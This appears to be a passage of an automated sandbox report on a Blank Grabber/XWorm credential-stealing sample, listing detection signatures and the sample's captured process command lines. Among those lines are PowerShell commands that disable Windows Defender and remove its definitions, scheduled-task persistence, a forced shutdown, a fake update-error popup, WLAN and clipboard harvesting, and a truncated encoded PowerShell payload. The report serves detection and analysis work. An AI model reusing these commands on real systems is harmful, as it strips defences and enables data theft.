Edit tour
Windows
Analysis Report
sB2ClgrGng.exe
Overview
General Information
Sample name: | sB2ClgrGng.exerenamed because original name is a hash value |
Original sample name: | d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda.exe |
Analysis ID: | 1532621 |
MD5: | 4667ad84b811400babc982785614bb5f |
SHA1: | 0016a4d0e998382722895dee4a062c0c318e37bf |
SHA256: | d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda |
Tags: | BlankGrabberexeuser-Chainskilabs |
Infos: | |
Detection
Blank Grabber, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Python Keylogger
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses shutdown.exe to shutdown or reboot the system
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- sB2ClgrGng.exe (PID: 5816 cmdline:
"C:\Users\ user\Deskt op\sB2Clgr Gng.exe" MD5: 4667AD84B811400BABC982785614BB5F) - sB2ClgrGng.exe (PID: 2892 cmdline:
"C:\Users\ user\Deskt op\sB2Clgr Gng.exe" MD5: 4667AD84B811400BABC982785614BB5F) - cmd.exe (PID: 4248 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\D esktop\sB2 ClgrGng.ex e'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7188 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\Des ktop\sB2Cl grGng.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 5544 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Set-MpP reference -DisableIn trusionPre ventionSys tem $true -DisableIO AVProtecti on $true - DisableRea ltimeMonit oring $tru e -Disable ScriptScan ning $true -EnableCo ntrolledFo lderAccess Disabled -EnableNet workProtec tion Audit Mode -Forc e -MAPSRep orting Dis abled -Sub mitSamples Consent Ne verSend && powershel l Set-MpPr eference - SubmitSamp lesConsent 2 & "%Pro gramFiles% \Windows D efender\Mp CmdRun.exe " -RemoveD efinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7224 cmdline:
powershell Set-MpPre ference -D isableIntr usionPreve ntionSyste m $true -D isableIOAV Protection $true -Di sableRealt imeMonitor ing $true -DisableSc riptScanni ng $true - EnableCont rolledFold erAccess D isabled -E nableNetwo rkProtecti on AuditMo de -Force -MAPSRepor ting Disab led -Submi tSamplesCo nsent Neve rSend MD5: 04029E121A0CFA5991749937DD22A1D9) - MpCmdRun.exe (PID: 7616 cmdline:
"C:\Progra m Files\Wi ndows Defe nder\MpCmd Run.exe" - RemoveDefi nitions -A ll MD5: B3676839B2EE96983F9ED735CD044159) - cmd.exe (PID: 7072 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\A ppData\Loc al\Temp\bo und.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2996 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7292 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\App Data\Local \Temp\boun d.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 1228 cmdline:
C:\Windows \system32\ cmd.exe /c "start bo und.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - bound.exe (PID: 7280 cmdline:
bound.exe MD5: 8D8BC4B4831CCCE11284D512630749C5) - schtasks.exe (PID: 7076 cmdline:
"C:\Window s\System32 \schtasks. exe" /crea te /f /RL HIGHEST /s c minute / mo 1 /tn " word" /tr "C:\Users\ user\AppDa ta\Roaming \word.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 2596 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - shutdown.exe (PID: 8592 cmdline:
shutdown.e xe /f /s / t 0 MD5: F2A4E18DA72BB2C5B21076A5DE382A20) - conhost.exe (PID: 8676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6980 cmdline:
C:\Windows \system32\ cmd.exe /c "mshta "j avascript: var sh=new ActiveXOb ject('WScr ipt.Shell' ); sh.Popu p('System failed to install re cent updat e. click o k to retry .', 0, 'Er ror', 0+16 );close()" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1196 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 7272 cmdline:
mshta "jav ascript:va r sh=new A ctiveXObje ct('WScrip t.Shell'); sh.Popup( 'System fa iled to in stall rece nt update. click ok to retry.' , 0, 'Erro r', 0+16); close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - cmd.exe (PID: 7320 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Pr ogramData\ Microsoft\ Windows\St art Menu\P rograms\St artUp\ . scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7408 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\Prog ramData\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tUp\ .sc r' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7660 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7712 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7968 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7676 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7956 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7852 cmdline:
C:\Windows \system32\ cmd.exe /c "WMIC /No de:localho st /Namesp ace:\\root \SecurityC enter2 Pat h Antiviru sProduct G et display Name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7988 cmdline:
WMIC /Node :localhost /Namespac e:\\root\S ecurityCen ter2 Path AntivirusP roduct Get displayNa me MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 7872 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Cli pboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8052 cmdline:
powershell Get-Clipb oard MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7452 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6356 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7992 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 8116 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 8196 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 8056 cmdline:
C:\Windows \system32\ cmd.exe /c "netsh wl an show pr ofile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 8208 cmdline:
netsh wlan show prof ile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - cmd.exe (PID: 8052 cmdline:
C:\Windows \system32\ cmd.exe /c "systemin fo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8252 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - systeminfo.exe (PID: 8312 cmdline:
systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD) - cmd.exe (PID: 8392 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll.exe -No Profile -E xecutionPo licy Bypas s -Encoded Command JA BzAG8AdQBy AGMAZQAgAD 0AIABAACIA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtADsA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtAC4A QwBvAGwAbA BlAGMAdABp AG8AbgBzAC 4ARwBlAG4A ZQByAGkAYw A7AA0ACgB1 AHMAaQBuAG cAIABTAHkA cwB0AGUAbQ AuAEQAcgBh AHcAaQBuAG cAOwANAAoA dQBzAGkAbg BnACAAUwB5 AHMAdABlAG 0ALgBXAGkA bgBkAG8Adw BzAC4ARgBv AHIAbQBzAD sADQAKAA0A CgBwAHUAYg BsAGkAYwAg AGMAbABhAH MAcwAgAFMA YwByAGUAZQ BuAHMAaABv AHQADQAKAH sADQAKACAA IAAgACAAcA B1AGIAbABp AGMAIABzAH QAYQB0AGkA YwAgAEwAaQ BzAHQAPABC AGkAdABtAG EAcAA+ACAA QwBhAHAAdA B1AHIAZQBT AGMAcgBlAG UAbgBzACgA KQANAAoAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAdg BhAHIAIABy AGUAcwB1AG wAdABzACAA PQAgAG4AZQ B3ACAATABp AHMAdAA8AE IAaQB0AG0A YQBwAD4AKA ApADsADQAK ACAAIAAgAC AAIAAgACAA IAB2AGEAcg AgAGEAbABs AFMAYwByAG UAZQBuAHMA IAA9ACAAUw BjAHIAZQBl AG4ALgBBAG wAbABTAGMA cgBlAGUAbg BzADsADQAK AA0ACgAgAC AAIAAgACAA IAAgACAAZg BvAHIAZQBh AGMAaAAgAC gAUwBjAHIA ZQBlAG4AIA BzAGMAcgBl AGUAbgAgAG kAbgAgAGEA bABsAFMAYw ByAGUAZQBu AHMAKQANAA oAIAAgACAA IAAgACAAIA AgAHsADQAK ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgAHQAcgB5 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAF IAZQBjAHQA YQBuAGcAbA BlACAAYgBv AHUAbgBkAH MAIAA9ACAA cwBjAHIAZQ BlAG4ALgBC AG8AdQBuAG QAcwA7AA0A CgAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHUAcw BpAG4AZwAg ACgAQgBpAH QAbQBhAHAA IABiAGkAdA BtAGEAcAAg AD0AIABuAG UAdwAgAEIA aQB0AG0AYQ BwACgAYgBv AHUAbgBkAH MALgBXAGkA ZAB0AGgALA AgAGIAbwB1 AG4AZABzAC 4ASABlAGkA ZwBoAHQAKQ ApAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg AHsADQAKAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAB1AHMAaQ BuAGcAIAAo AEcAcgBhAH AAaABpAGMA cwAgAGcAcg BhAHAAaABp AGMAcwAgAD 0AIABHAHIA YQBwAGgAaQ BjAHMALgBG AHIAbwBtAE kAbQBhAGcA ZQAoAGIAaQ B0AG0AYQBw ACkAKQANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgAGcA cgBhAHAAaA BpAGMAcwAu AEMAbwBwAH kARgByAG8A bQBTAGMAcg BlAGUAbgAo AG4AZQB3AC AAUABvAGkA bgB0ACgAYg BvAHUAbgBk AHMALgBMAG UAZgB0ACwA IABiAG8AdQ BuAGQAcwAu AFQAbwBwAC kALAAgAFAA bwBpAG4AdA AuAEUAbQBw AHQAeQAsAC AAYgBvAHUA bgBkAHMALg BTAGkAegBl ACkAOwANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAH0ADQ AKAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAcgBlAHMA dQBsAHQAcw AuAEEAZABk ACgAKABCAG kAdABtAGEA cAApAGIAaQ B0AG0AYQBw AC4AQwBsAG 8AbgBlACgA KQApADsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAYwBh AHQAYwBoAC AAKABFAHgA YwBlAHAAdA